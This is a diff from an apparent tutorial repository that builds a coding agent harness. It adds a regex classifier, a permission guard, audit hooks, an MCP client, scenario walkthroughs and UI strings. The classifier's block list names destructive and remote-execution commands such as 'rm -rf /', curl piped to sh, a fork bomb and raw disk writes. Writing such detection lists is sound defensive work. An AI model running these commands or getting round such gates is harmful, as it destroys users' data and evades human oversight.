{WORKDIR}.\nUse tools to solve tasks. The harness enforces security:\ndangerous commands are blocked, some require your confirmation.\nMCP tools extend your reach beyond built-in tools. Act, don't explain.\"\"\"\n\n\n# === SECTION: security_classifier (s14) ===\n\nDANGEROUS_PATTERNS = [\n (re.compile(r\"rm\\s+-rf\\s+/(?!\\w)\"), \"Root recursive delete\"),\n (re.compile(r\"sudo\\s+\"), \"Elevated privileges\"),\n (re.compile(r\">\\s*/etc/\"), \"Overwrite system config\"),\n (re.compile(r\"curl.*\\|\\s*(ba)?sh\"), \"Remote code execution\"),\n (re.compile(r\"wget.*\\|\\s*(ba)?sh\"), \"Remote code execution\"),\n (re.compile(r\"chmod\\s+-R\\s+777\\s+/\"), \"Recursive 777\"),\n (re.compile(r\"dd\\s+.*of=/dev/\"), \"Raw device write\"),\n (re.compile(r\"mkfs\\.\"), \"Filesystem format\"),\n (re.compile(r\":\\(\\)\\{.*:\\|:&\\}\"), \"Fork bomb\"),\n (re.compile(r\"\\b(shutdown|reboot|halt|poweroff)\\b\"), \"System shutdown\"),\n (re.compile(r\"crontab\\s+-r\"), \"Delete crontab\"),\n (re.compile(r\"git\\s+push\\s+--force\"), \"Force push\"),\n (re.compile(r\"git\\s+reset\\s+--hard\"), \"Hard reset\"),\n (re.compile(r\"npm\\s+publish\"), \"Publish package\"),\n (re.compile(r\">\\s*/dev/sd\"), \"Write to raw disk\"),\n]\n\nSAFE_COMMANDS = {\n \"ls\", \"cat\", \"pwd\", \"echo\", \"head\", \"tail\", \"wc\", \"sort\",\n \"grep\", \"find\", \"git\", \"which\", \"type\", \"file\", \"diff\",\n \"python\", \"python3\", \"node\", \"npm\", \"pip\", \"tree\", \"du\",\n \"stat\", \"date\", \"whoami\", \"hostname\", \"uname\", \"true\", \"false\",\n}\n\nCLASSIFIER_PROMPT = \"\"\"Classify this shell command's danger level.\nReply with EXACTLY one word: safe, moderate, or dangerous.\n\n- safe: read-only or non-destructive (ls, cat, git status)\n- moderate: writes files but recoverable (rm single file, pip install)\n- dangerous: irreversible or system-wide (rm -rf /, sudo, force push)\n\nCommand: {command}\nContext: {context}\"\"\"\n\n\nclass SecurityClassifier:\n def __init__(self, client, model):\n self.client = client\n self.model = model\n\n def quick_scan(self, command: str) -> tuple[str, str] | None:\n for pat, reason in DANGEROUS_PATTERNS:\n if pat.search(command):\n return (\"dangerous\", reason)\n return None\n\n def llm_classify(self, command: str, context: str = \"\") -> str:\n prompt = CLASSIFIER_PROMPT.format(command=command, context=context[-300:])\n try:\n resp = self.client.messages.create(\n model=self.model,\n messages=[{\"role\": \"user\", \"content\": prompt}],\n max_tokens=10,\n )\n answer = resp.content[0].text.strip().lower()\n for level in (\"safe\", \"moderate\", \"dangerous\"):\n if level in answer:\n return level\n except Exception as e:\n print(f\"[classifier:llm] fallback to moderate: {e}\")\n return \"moderate\"\n\n def classify(self, command: str, context: str = \"\") -> dict:\n quick = self.quick_scan(command)\n if quick:\n level, reason = quick\n return {\"level\": level, \"mode\": \"deny\", \"reason\": reason, \"source\": \"pattern\"}\n base = command.split()[0] if command.split() else \"\"\n has_compound = bool(re.search(r'[;&|`]|\\$\\(', command))\n if base in SAFE_COMMANDS and not has_compound:\n return {\"level\": \"safe\", \"mode\": \"allow\", \"reason\": \"\", \"source\": \"whitelist\"}\n level = self.llm_classify(command, context)\n mode = {\"safe\": \"allow\", \"moderate\": \"ask\", \"dangerous\": \"deny\"}[level]\n return {\"level\": level, \"mode\": mode, \"reason\": f\"LLM: {level}\", \"source\": \"llm\"}\n\n\n# === SECTION: permission_guard (s13) ===\n\nclass PermissionGuard:\n def __init__(self, classifier: SecurityClassifier):\n self.classifier = classifier\n\n def check(self, command: str, context: str = \"\") -> tuple[bool, str, str]:\n result = self.classifier.classify(command, context)\n mode = result[\"mode\"]\n if mode == \"deny\":\n return (False, command, result[\"reason\"])\n elif mode == \"ask\":\n approved = self._prompt_user(command, result[\"reason\"])\n return (approved, command, result[\"reason\"])\n else:\n return (True, command, \"\")\n\n def _prompt_user(self, command: str, reason: str) -> bool:\n print(f\"\\033[33m[security:{reason}]\\033[0m\")\n print(f\"\\033[33m Command: {command}\\033[0m\")\n ans = input(\"\\033[33m Allow? (y/n) \\033[0m\").strip().lower()\n return ans == \"y\"\n\n\n# === SECTION: hooks (s15) ===\n\nHOOK_EVENTS = (\n \"PreToolUse\", \"PostToolUse\", \"PreBash\", \"PostBash\",\n \"AgentStart\", \"AgentStop\", \"OnError\", \"OnCompact\",\n)\nHOOKS_DIR = WORKDIR / \".hooks\"\n\n\nclass HookManager:\n def __init__(self):\n self._hooks: dict[str, list] = {e: [] for e in HOOK_EVENTS}\n HOOKS_DIR.mkdir(exist_ok=True)\n self._load_defaults()\n\n def _load_defaults(self):\n self.register(\"PreBash\", \"observe\", self._audit_log,\n \"bash_audit_log\", \"Log all bash commands\")\n self.register(\"PostToolUse\", \"observe\", self._auto_git_add,\n \"auto_git_add\", \"Auto git add after write/edit\",\n tool_filter=\"write_file\")\n\n def register(self, event: str, mode: str, handler, name: str,\n description: str = \"\", tool_filter: str = None):\n self._hooks[event].append({\n \"event\": event, \"mode\": mode, \"handler\": handler,\n \"name\": name, \"description\": description, \"tool_filter\": tool_filter,\n })\n\n def fire(self, event: str, context: dict) -> dict | None:\n for hook in self._hooks.get(event, []):\n if hook[\"tool_filter\"] and context.get(\"tool\") != hook[\"tool_filter\"]:\n continue\n result = hook[\"handler\"](context)\n if result is None:\n continue\n if isinstance(result, str):\n return {\"action\": \"block\", \"reason\": result, \"hook\": hook[\"name\"]}\n if isinstance(result, dict) and result.get(\"action\") == \"block\":\n return result\n return None\n\n def list_hooks(self) -> str:\n lines = []\n for event in HOOK_EVENTS:\n for h in self._hooks[event]:\n lines.append(f\" {event:15} [{h['mode']:7}] {h['name']}: {h['description']}\")\n return \"\\n\".join(lines)\n\n def _audit_log(self, context: dict):\n log_file = HOOKS_DIR / \"audit.jsonl\"\n entry = {\"timestamp\": time.time(),\n \"tool\": context.get(\"tool\"),\n \"command\": context.get(\"input\", {}).get(\"command\")}\n with log_file.open(\"a\") as f:\n f.write(json.dumps(entry) + \"\\n\")\n\n def _auto_git_add(self, context: dict):\n path = context.get(\"input\", {}).get(\"path\", \"\")\n if path:\n subprocess.run([\"git\", \"add\", path], cwd=WORKDIR,\n capture_output=True, text=True)\n\n\n# === SECTION: mcp (s16) ===\n\nMCP_CONFIG_PATH = WORKDIR / \".mcp\" / \"config.json\"\nMCP_PROTOCOL_VERSION = \"2024-11-05\"\n\n\nclass MCPServerConfig:\n def __init__(self, name: str, transport: str, command: str = \"\",\n url: str = \"\", args: list = None, env: dict = None):\n self.name = name\n self.transport = transport\n self.command = command\n self.url = url\n self.args = args or []\n self.env = env or {}\n\n\nclass MCPClient:\n def __init__(self, config: MCPServerConfig):\n self.config = config\n self.process = None\n self._id = 0\n\n def start(self):\n if self.config.transport == \"stdio\" and self.config.command:\n cmd = [self.config.command] + self.config.args\n env = {**os.environ, **self.config.env} if self.config.env else None\n self.process = subprocess.Popen(\n cmd,\n stdin=subprocess.PIPE, stdout=subprocess.PIPE,\n stderr=subprocess.PIPE, cwd=WORKDIR, env=env,\n )\n\n def _next_id(self) -> int:\n self._id += 1\n return self._id\n\n def _send_rpc(self, method: str, params: dict = None) -> dict:\n request = {\"jsonrpc\": \"2.0\", \"method\": method, \"id\": self._next_id()}\n if params:\n request[\"params\"] = params\n self.process.stdin.write((json.dumps(request) + \"\\n\").encode())\n self.process.stdin.flush()\n line = self.process.stdout.readline().decode().strip()\n return json.loads(line).get(\"result\", {}) if line else {}\n\n def discover_tools(self) -> list:\n result = self._send_rpc(\"tools/list\")\n return result.get(\"tools\", [])\n\n def call(self, tool_name: str, arguments: dict) -> str:\n result = self._send_rpc(\"tools/call\", {\"name\": tool_name, \"arguments\": arguments})\n contents = result.get(\"content\", [])\n return \"\\n\".join(c.get(\"text\", \"\") for c in contents if c.get(\"type\") == \"text\")\n\n def shutdown(self):\n if self.process:\n self.process.terminate()\n self.process.wait(timeout=5)\n\n\nclass MCPManager:\n def __init__(self):\n self._clients: dict[str, MCPClient] = {}\n self._tools: dict[str, tuple[str, dict]] = {}\n\n def load_config(self) -> list[MCPServerConfig]:\n if not MCP_CONFIG_PATH.exists():\n return []\n data = json.loads(MCP_CONFIG_PATH.read_text())\n servers = data.get(\"mcpServers\", {})\n return [MCPServerConfig(name=k, **v) for k, v in servers.items()]\n\n def connect_all(self) -> list[dict]:\n discovered = []\n for config in self.load_config():\n try:\n c = MCPClient(config)\n c.start()\n tools = c.discover_tools()\n self._clients[config.name] = c\n for tool in tools:\n self._tools[tool[\"name\"]] = (config.name, tool)\n discovered.append(tool)\n except Exception as e:\n print(f\"[mcp] Failed to connect {config.name}: {e}\")\n return discovered\n\n def call(self, tool_name: str, arguments: dict) -> str:\n if tool_name not in self._tools:\n return f\"Unknown MCP tool: {tool_name}\"\n server_name, _ = self._tools[tool_name]\n return self._clients[server_name].call(tool_name, arguments)\n\n def shutdown_all(self):\n for c in self._clients.values():\n c.shutdown()\n\n def list_servers(self) -> str:\n lines = []\n for name, c in self._clients.items():\n tools = [t for t, (s, _) in self._tools.items() if s == name]\n lines.append(f\" {name} ({c.config.transport}): {len(tools)} tools\")\n return \"\\n\".join(lines) if lines else \" (no MCP servers connected)\"\n\n\n# === SECTION: initialize all managers ===\n\nCLASSIFIER = SecurityClassifier(client, MODEL)\nGUARD = PermissionGuard(classifier=CLASSIFIER)\nHOOKS = HookManager()\nMCP = MCPManager()\n\n\n# === SECTION: base tools ===\n\ndef safe_path(p: str) -> Path:\n path = (WORKDIR / p).resolve()\n if not path.is_relative_to(WORKDIR):\n raise ValueError(f\"Path escapes workspace: {p}\")\n return path\n\n\ndef run_bash(command: str) -> str:\n try:\n r = subprocess.run(command, shell=True, cwd=WORKDIR,\n capture_output=True, text=True, timeout=120)\n out = (r.stdout + r.stderr).strip()\n return out[:50000] if out else \"(no output)\"\n except subprocess.TimeoutExpired:\n return \"Error: Timeout (120s)\"\n\n\ndef run_read(path: str, limit: int = None) -> str:\n try:\n lines = safe_path(path).read_text().splitlines()\n if limit and limit < len(lines):\n lines = lines[:limit] + [f\"... ({len(lines) - limit} more lines)\"]\n return \"\\n\".join(lines)[:50000]\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_write(path: str, content: str) -> str:\n try:\n fp = safe_path(path)\n fp.parent.mkdir(parents=True, exist_ok=True)\n fp.write_text(content)\n return f\"Wrote {len(content)} bytes to {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\ndef run_edit(path: str, old_text: str, new_text: str) -> str:\n try:\n fp = safe_path(path)\n content = fp.read_text()\n if old_text not in content:\n return f\"Error: Text not found in {path}\"\n fp.write_text(content.replace(old_text, new_text, 1))\n return f\"Edited {path}\"\n except Exception as e:\n return f\"Error: {e}\"\n\n\n# === SECTION: hook & mcp management tools ===\n\ndef hook_register(event: str, mode: str, name: str,\n description: str = \"\", tool_filter: str = None) -> str:\n if event not in HOOK_EVENTS:\n return f\"Unknown event: {event}. Available: {', '.join(HOOK_EVENTS)}\"\n if mode not in (\"observe\", \"modify\", \"block\"):\n return f\"Unknown mode: {mode}. Available: observe, modify, block\"\n # For observe and block, register a simple handler\n if mode == \"observe\":\n def handler(ctx): pass\n elif mode == \"block\":\n def handler(ctx): return f\"Blocked by user hook: {name}\"\n else:\n def handler(ctx): pass\n HOOKS.register(event, mode, handler, name, description, tool_filter)\n return f\"Registered hook '{name}' on {event} ({mode})\"\n\n\ndef mcp_discover() -> str:\n tools = MCP.connect_all()\n # Register discovered MCP tools into TOOL_HANDLERS and TOOLS\n for tool_schema in tools:\n tname = tool_schema[\"name\"]\n TOOL_HANDLERS[tname] = (lambda n: lambda **kw: MCP.call(n, kw))(tname)\n TOOLS.append(tool_schema)\n return f\"Discovered {len(tools)} MCP tools\"\n\n\nTOOL_HANDLERS = {\n \"bash\": lambda **kw: run_bash(kw[\"command\"]),\n \"read_file\": lambda **kw: run_read(kw[\"path\"], kw.get(\"limit\")),\n \"write_file\": lambda **kw: run_write(kw[\"path\"], kw[\"content\"]),\n \"edit_file\": lambda **kw: run_edit(kw[\"path\"], kw[\"old_text\"], kw[\"new_text\"]),\n \"hook_register\": lambda **kw: hook_register(kw[\"event\"], kw[\"mode\"], kw[\"name\"],\n kw.get(\"description\", \"\"), kw.get(\"tool_filter\")),\n \"hook_list\": lambda **kw: HOOKS.list_hooks(),\n \"mcp_list_servers\": lambda **kw: MCP.list_servers(),\n \"mcp_discover\": lambda **kw: mcp_discover(),\n}\n\nTOOLS = [\n {\"name\": \"bash\", \"description\": \"Run a shell command. Routed through security pipeline: hook -> classifier -> permission -> execute -> hook.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"command\": {\"type\": \"string\"}}, \"required\": [\"command\"]}},\n {\"name\": \"read_file\", \"description\": \"Read file contents.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"limit\": {\"type\": \"integer\"}}, \"required\": [\"path\"]}},\n {\"name\": \"write_file\", \"description\": \"Write content to file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"content\": {\"type\": \"string\"}}, \"required\": [\"path\", \"content\"]}},\n {\"name\": \"edit_file\", \"description\": \"Replace exact text in file.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"path\": {\"type\": \"string\"}, \"old_text\": {\"type\": \"string\"}, \"new_text\": {\"type\": \"string\"}}, \"required\": [\"path\", \"old_text\", \"new_text\"]}},\n {\"name\": \"hook_register\", \"description\": \"Register a hook to intercept tool calls. Events: PreToolUse, PostToolUse, PreBash, PostBash, AgentStart, AgentStop. Modes: observe, modify, block.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {\"event\": {\"type\": \"string\"}, \"mode\": {\"type\": \"string\"}, \"name\": {\"type\": \"string\"}, \"description\": {\"type\": \"string\"}, \"tool_filter\": {\"type\": \"string\"}}, \"required\": [\"event\", \"mode\", \"name\"]}},\n {\"name\": \"hook_list\", \"description\": \"List all registered hooks.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"mcp_list_servers\", \"description\": \"List connected MCP servers and their tools.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n {\"name\": \"mcp_discover\", \"description\": \"Re-scan and register MCP tools from all configured servers.\",\n \"input_schema\": {\"type\": \"object\", \"properties\": {}}},\n]\n\n\n# === SECTION: pipeline ===\n\ndef execute_tool(tool_name: str, tool_input: dict, context: dict) -> str:\n # Layer 1: Pre-tool hook\n hook_ctx = {\"tool\": tool_name, \"input\": tool_input}\n pre = HOOKS.fire(\"PreToolUse\", hook_ctx)\n if pre and pre.get(\"action\") == \"block\":\n return f\"Blocked by hook: {pre['reason']}\"\n\n # Layer 1b: Pre-bash hook (finer-grained, logs audit trail)\n if tool_name == \"bash\":\n pre_bash = HOOKS.fire(\"PreBash\", hook_ctx)\n if pre_bash and pre_bash.get(\"action\") == \"block\":\n return f\"Blocked by bash hook: {pre_bash['reason']}\"\n\n # Layer 2: Classifier + Layer 3: Permission (bash only)\n if tool_name == \"bash\":\n cmd = tool_input.get(\"command\", \"\")\n allowed, cmd_to_run, reason = GUARD.check(cmd, context.get(\"recent_text\", \"\"))\n if not allowed:\n return f\"Security denied: {reason}\"\n tool_input = {**tool_input, \"command\": cmd_to_run}\n\n # Layer 4: Execute\n handler = TOOL_HANDLERS.get(tool_name)\n if handler:\n try:\n output = handler(**tool_input)\n except Exception as e:\n HOOKS.fire(\"OnError\", {\"tool\": tool_name, \"error\": str(e)})\n output = f\"Error: {e}\"\n elif tool_name in MCP._tools:\n output = MCP.call(tool_name, tool_input)\n else:\n output = f\"Unknown tool: {tool_name}\"\n\n # Layer 5: Post-tool hook\n HOOKS.fire(\"PostToolUse\", {\"tool\": tool_name, \"output\": output})\n if tool_name == \"bash\":\n HOOKS.fire(\"PostBash\", {\"tool\": tool_name, \"output\": output})\n\n return output\n\n\n# === SECTION: agent_loop ===\n\ndef agent_loop(messages: list):\n HOOKS.fire(\"AgentStart\", {\"messages\": messages})\n try:\n while True:\n response = client.messages.create(\n model=MODEL, system=SYSTEM, messages=messages,\n tools=TOOLS, max_tokens=8000,\n )\n messages.append({\"role\": \"assistant\", \"content\": response.content})\n if response.stop_reason != \"tool_use\":\n return\n results = []\n recent_text = \"\"\n for block in response.content:\n if hasattr(block, \"text\") and block.text:\n recent_text += block.text[-200:]\n for block in response.content:\n if block.type == \"tool_use\":\n output = execute_tool(block.name, block.input,\n {\"recent_text\": recent_text})\n print(f\"> {block.name}:\")\n print(str(output)[:200])\n results.append({\"type\": \"tool_result\", \"tool_use_id\": block.id,\n \"content\": str(output)})\n messages.append({\"role\": \"user\", \"content\": results})\n finally:\n HOOKS.fire(\"AgentStop\", {})\n\n\n# === SECTION: repl ===\nif __name__ == \"__main__\":\n # Connect MCP servers at startup\n print(\"[mcp] Connecting servers...\")\n print(mcp_discover())\n\n history = []\n while True:\n try:\n query = input(\"\\033[36ms17 >> \\033[0m\")\n except (EOFError, KeyboardInterrupt):\n break\n if query.strip().lower() in (\"q\", \"exit\", \"\"):\n break\n # REPL commands\n if query.strip() == \"/security\":\n print(f\"Classifier: active ({len(DANGEROUS_PATTERNS)} patterns + LLM)\")\n print(f\"Permission: deny/ask/allow\")\n continue\n if query.strip() == \"/hooks\":\n print(HOOKS.list_hooks())\n continue\n if query.strip() == \"/mcp\":\n print(MCP.list_servers())\n continue\n if query.strip() == \"/audit\":\n log = HOOKS_DIR / \"audit.jsonl\"\n if log.exists():\n print(log.read_text()[-2000:])\n else:\n print(\" (no audit log)\")\n continue\n history.append({\"role\": \"user\", \"content\": query})\n agent_loop(history)\n response_content = history[-1][\"content\"]\n if isinstance(response_content, list):\n for block in response_content:\n if hasattr(block, \"text\"):\n print(block.text)\n print()\n MCP.shutdown_all()\n" } ], "diffs": [ @@ -844,7 +1064,7 @@ "write_file", "edit_file" ], - "locDelta": 36 + "locDelta": 26 }, { "from": "s02", @@ -868,7 +1088,7 @@ "newTools": [ "task" ], - "locDelta": -25 + "locDelta": -23 }, { "from": "s04", @@ -880,7 +1100,7 @@ "newTools": [ "load_skill" ], - "locDelta": 36 + "locDelta": 34 }, { "from": "s05", @@ -894,7 +1114,7 @@ "newTools": [ "compact" ], - "locDelta": 18 + "locDelta": 24 }, { "from": "s06", @@ -909,7 +1129,7 @@ "task_list", "task_get" ], - "locDelta": 2 + "locDelta": -8 }, { "from": "s07", @@ -922,7 +1142,7 @@ "background_run", "check_background" ], - "locDelta": -9 + "locDelta": -6 }, { "from": "s08", @@ -946,7 +1166,7 @@ "list_teammates", "broadcast" ], - "locDelta": 150 + "locDelta": 147 }, { "from": "s09", @@ -977,7 +1197,7 @@ "idle", "claim_task" ], - "locDelta": 80 + "locDelta": 90 }, { "from": "s11", @@ -1009,7 +1229,27 @@ "worktree_keep", "worktree_events" ], - "locDelta": 195 + "locDelta": 189 + }, + { + "from": "s12", + "to": "s13", + "newClasses": [ + "PermissionGuard" + ], + "newFunctions": [], + "newTools": [], + "locDelta": -491 + }, + { + "from": "s13", + "to": "s14", + "newClasses": [ + "SecurityClassifier" + ], + "newFunctions": [], + "newTools": [], + "locDelta": 19 } ] } \ No newline at end of file diff --git a/web/src/data/scenarios/s13.json b/web/src/data/scenarios/s13.json new file mode 100644 index 000000000..84e458eee --- /dev/null +++ b/web/src/data/scenarios/s13.json @@ -0,0 +1,51 @@ +{ + "version": "s13", + "title": "Permission Guard", + "description": "An agent with a permission model that classifies commands before execution", + "steps": [ + { + "type": "user_message", + "content": "List all files and then delete temp.log", + "annotation": "User sends a multi-step task" + }, + { + "type": "assistant_text", + "content": "I'll list the files first, then delete temp.log.", + "annotation": "Model plans two tool calls" + }, + { + "type": "tool_call", + "content": "ls -la", + "toolName": "bash", + "annotation": "ls is in ALLOWED_COMMANDS -> auto-allow" + }, + { + "type": "tool_result", + "content": "temp.log hello.py README.md", + "toolName": "bash", + "annotation": "Allowed: ls is a safe read-only command" + }, + { + "type": "tool_call", + "content": "rm temp.log", + "toolName": "bash", + "annotation": "rm matches ASK_PATTERNS -> needs user confirmation" + }, + { + "type": "system_event", + "content": "[permission:ask] File deletion\n Command: rm temp.log\n Allow? (y/n) y", + "annotation": "PermissionGuard classifies as 'ask' mode, user approves" + }, + { + "type": "tool_result", + "content": "(file deleted)", + "toolName": "bash", + "annotation": "Command executed after user approval" + }, + { + "type": "assistant_text", + "content": "Done! Listed files and deleted temp.log.", + "annotation": "Both operations completed with appropriate permission checks" + } + ] +} diff --git a/web/src/data/scenarios/s14.json b/web/src/data/scenarios/s14.json new file mode 100644 index 000000000..7125bf789 --- /dev/null +++ b/web/src/data/scenarios/s14.json @@ -0,0 +1,51 @@ +{ + "version": "s14", + "title": "Security Classifier", + "description": "Two-layer command classification: regex quick-scan + LLM intent analysis", + "steps": [ + { + "type": "user_message", + "content": "Clean up the build directory and check git status", + "annotation": "User asks for potentially dangerous operations" + }, + { + "type": "assistant_text", + "content": "I'll remove the build directory and check git status.", + "annotation": "Model plans two operations of different risk levels" + }, + { + "type": "tool_call", + "content": "rm -rf build/", + "toolName": "bash", + "annotation": "Quick scan: no dangerous pattern match -> needs LLM classification" + }, + { + "type": "system_event", + "content": "[Layer 1: pass] No pattern match\n[Layer 2: LLM] -> moderate\n[security:moderate] Allow? (y/n) y", + "annotation": "LLM classifies 'rm -rf build/' as moderate risk, user approves" + }, + { + "type": "tool_result", + "content": "(build directory removed)", + "toolName": "bash", + "annotation": "Executed after LLM classification and user approval" + }, + { + "type": "tool_call", + "content": "git status", + "toolName": "bash", + "annotation": "git is in SAFE_COMMANDS whitelist -> zero-cost auto-allow" + }, + { + "type": "tool_result", + "content": "On branch main\nnothing to commit", + "toolName": "bash", + "annotation": "Whitelist: no classifier call needed" + }, + { + "type": "assistant_text", + "content": "Build directory cleaned and git status checked.", + "annotation": "Both operations completed with appropriate classification" + } + ] +} diff --git a/web/src/data/scenarios/s17.json b/web/src/data/scenarios/s17.json new file mode 100644 index 000000000..bb84ff09b --- /dev/null +++ b/web/src/data/scenarios/s17.json @@ -0,0 +1,76 @@ +{ + "version": "s17", + "title": "Secure Extension Harness", + "description": "Full security pipeline: Hook -> Classify -> Permission -> Execute -> PostHook", + "steps": [ + { + "type": "user_message", + "content": "Check git log and then force push to origin", + "annotation": "User mixes safe and dangerous operations" + }, + { + "type": "system_event", + "content": "[AgentStart] hook fired", + "annotation": "[Layer 1] AgentStart lifecycle hook triggers" + }, + { + "type": "assistant_text", + "content": "I'll check the git log first.", + "annotation": "Model starts with the safe operation" + }, + { + "type": "tool_call", + "content": "git log --oneline -5", + "toolName": "bash", + "annotation": "Passes through all security layers" + }, + { + "type": "system_event", + "content": "[PreToolUse] hook -> pass\n[PreBash] hook -> audit logged\n[Classifier] whitelist: git -> allow", + "annotation": "[Layers 1-3] PreHook passes, audit logged, classifier whitelist" + }, + { + "type": "tool_result", + "content": "a1b2c3d Fix bug\ne4f5g6h Add feature\ni7j8k9l Update docs", + "toolName": "bash", + "annotation": "Safe command passed all 5 layers" + }, + { + "type": "system_event", + "content": "[PostToolUse] hook -> auto_git_add skipped\n[PostBash] hook -> pass", + "annotation": "[Layer 5] PostHooks fire (no side effects for git log)" + }, + { + "type": "assistant_text", + "content": "Now I'll force push to origin.", + "annotation": "Model attempts the dangerous operation" + }, + { + "type": "tool_call", + "content": "git push --force origin main", + "toolName": "bash", + "annotation": "This should be blocked by the security pipeline" + }, + { + "type": "system_event", + "content": "[PreToolUse] hook -> pass\n[PreBash] hook -> audit logged\n[Classifier] pattern match: 'Force push' -> DENY", + "annotation": "[Layer 2] Quick scan catches force push pattern -> denied immediately" + }, + { + "type": "tool_result", + "content": "Security denied: Force push", + "toolName": "bash", + "annotation": "Blocked at Layer 2, never reaches execution" + }, + { + "type": "assistant_text", + "content": "I can't force push as it's blocked by security policy. Would you like me to push normally instead?", + "annotation": "Model acknowledges the security block and suggests an alternative" + }, + { + "type": "system_event", + "content": "[AgentStop] hook fired", + "annotation": "[Layer 1] AgentStop lifecycle hook triggers" + } + ] +} diff --git a/web/src/i18n/messages/en.json b/web/src/i18n/messages/en.json index 6dcb3effb..665b53846 100644 --- a/web/src/i18n/messages/en.json +++ b/web/src/i18n/messages/en.json @@ -1,18 +1,19 @@ { "meta": { "title": "Learn Claude Code", "description": "Build a nano Claude Code-like agent from 0 to 1, one mechanism at a time" }, "nav": { "home": "Home", "timeline": "Timeline", "compare": "Compare", "layers": "Layers", "github": "GitHub" }, - "home": { "hero_title": "Learn Claude Code", "hero_subtitle": "Build a nano Claude Code-like agent from 0 to 1, one mechanism at a time", "start": "Start Learning", "core_pattern": "The Core Pattern", "core_pattern_desc": "Every AI coding agent shares the same loop: call the model, execute tools, feed results back. Production systems add policy, permissions, and lifecycle layers on top.", "learning_path": "Learning Path", "learning_path_desc": "12 progressive sessions, from a simple loop to isolated autonomous execution", "layers_title": "Architectural Layers", "layers_desc": "Five orthogonal concerns that compose into a complete agent", "loc": "LOC", "learn_more": "Learn More", "versions_in_layer": "versions", "message_flow": "Message Growth", "message_flow_desc": "Watch the messages array grow as the agent loop executes" }, + "home": { "hero_title": "Learn Claude Code", "hero_subtitle": "Build a nano Claude Code-like agent from 0 to 1, one mechanism at a time", "start": "Start Learning", "core_pattern": "The Core Pattern", "core_pattern_desc": "Every AI coding agent shares the same loop: call the model, execute tools, feed results back. Production systems add policy, permissions, and lifecycle layers on top.", "learning_path": "Learning Path", "learning_path_desc": "17 progressive sessions, from a simple loop to secure extensible execution", "layers_title": "Architectural Layers", "layers_desc": "Five orthogonal concerns that compose into a complete agent", "loc": "LOC", "learn_more": "Learn More", "versions_in_layer": "versions", "message_flow": "Message Growth", "message_flow_desc": "Watch the messages array grow as the agent loop executes" }, "version": { "loc": "lines of code", "tools": "tools", "new": "New", "prev": "Previous", "next": "Next", "view_source": "View Source", "view_diff": "View Diff", "design_decisions": "Design Decisions", "whats_new": "What's New", "tutorial": "Tutorial", "simulator": "Agent Loop Simulator", "execution_flow": "Execution Flow", "architecture": "Architecture", "concept_viz": "Concept Visualization", "alternatives": "Alternatives Considered", "tab_learn": "Learn", "tab_simulate": "Simulate", "tab_code": "Code", "tab_deep_dive": "Deep Dive" }, "sim": { "play": "Play", "pause": "Pause", "step": "Step", "reset": "Reset", "speed": "Speed", "step_of": "of" }, - "timeline": { "title": "Learning Path", "subtitle": "s01 to s12: Progressive Agent Design", "layer_legend": "Layer Legend", "loc_growth": "LOC Growth", "learn_more": "Learn More" }, + "timeline": { "title": "Learning Path", "subtitle": "s01 to s17: Progressive Agent Design", "layer_legend": "Layer Legend", "loc_growth": "LOC Growth", "learn_more": "Learn More" }, "layers": { "title": "Architectural Layers", - "subtitle": "Five orthogonal concerns that compose into a complete agent", + "subtitle": "Six orthogonal concerns that compose into a complete agent", "tools": "What the agent CAN do. The foundation: tools give the model capabilities to interact with the world.", "planning": "How work is organized. From simple todo lists to dependency-aware task boards shared across agents.", "memory": "Keeping context within limits. Compression strategies that let agents work infinitely without losing coherence.", "concurrency": "Non-blocking execution. Background threads and notification buses for parallel work.", - "collaboration": "Multi-agent coordination. Teams, messaging, and autonomous teammates that think for themselves." + "collaboration": "Multi-agent coordination. Teams, messaging, and autonomous teammates that think for themselves.", + "security": "Protecting the user from the agent. Permission models, security classifiers, lifecycle hooks, and external tool protocols." }, "compare": { "title": "Compare Versions", @@ -50,14 +51,20 @@ "s09": "Agent Teams", "s10": "Team Protocols", "s11": "Autonomous Agents", - "s12": "Worktree + Task Isolation" + "s12": "Worktree + Task Isolation", + "s13": "Permission Guard", + "s14": "Security Classifier", + "s15": "Hooks System", + "s16": "MCP Client", + "s17": "Secure Extension Harness" }, "layer_labels": { "tools": "Tools & Execution", "planning": "Planning & Coordination", "memory": "Memory Management", "concurrency": "Concurrency", - "collaboration": "Collaboration" + "collaboration": "Collaboration", + "security": "Security & Extensibility" }, "viz": { "s01": "The Agent While-Loop", @@ -71,6 +78,11 @@ "s09": "Agent Team Mailboxes", "s10": "FSM Team Protocols", "s11": "Autonomous Agent Cycle", - "s12": "Worktree Task Isolation" + "s12": "Worktree Task Isolation", + "s13": "Permission Guard Pipeline", + "s14": "Two-Layer Security Classifier", + "s15": "Hook Manager Event Bus", + "s16": "MCP Tool Discovery", + "s17": "Secure Execution Pipeline" } } diff --git a/web/src/i18n/messages/ja.json b/web/src/i18n/messages/ja.json index 25192d20d..79bb0ba6d 100644 --- a/web/src/i18n/messages/ja.json +++ b/web/src/i18n/messages/ja.json @@ -1,18 +1,19 @@ { "meta": { "title": "Learn Claude Code", "description": "0 から 1 へ nano Claude Code-like agent を構築し、毎回 1 つの仕組みを追加" }, "nav": { "home": "ホーム", "timeline": "学習パス", "compare": "バージョン比較", "layers": "アーキテクチャ層", "github": "GitHub" }, - "home": { "hero_title": "Learn Claude Code", "hero_subtitle": "0 から 1 へ nano Claude Code-like agent を構築し、毎回 1 つの仕組みを追加", "start": "学習を始める", "core_pattern": "コアパターン", "core_pattern_desc": "すべての AI コーディングエージェントは同じループを共有する:モデルを呼び出し、ツールを実行し、結果を返す。実運用ではこの上にポリシー、権限、ライフサイクル層が重なる。", "learning_path": "学習パス", "learning_path_desc": "12の段階的セッション、シンプルなループから分離された自律実行まで", "layers_title": "アーキテクチャ層", "layers_desc": "5つの直交する関心事が完全なエージェントを構成", "loc": "行", "learn_more": "詳細を見る", "versions_in_layer": "バージョン", "message_flow": "メッセージの増加", "message_flow_desc": "エージェントループ実行時のメッセージ配列の成長を観察" }, + "home": { "hero_title": "Learn Claude 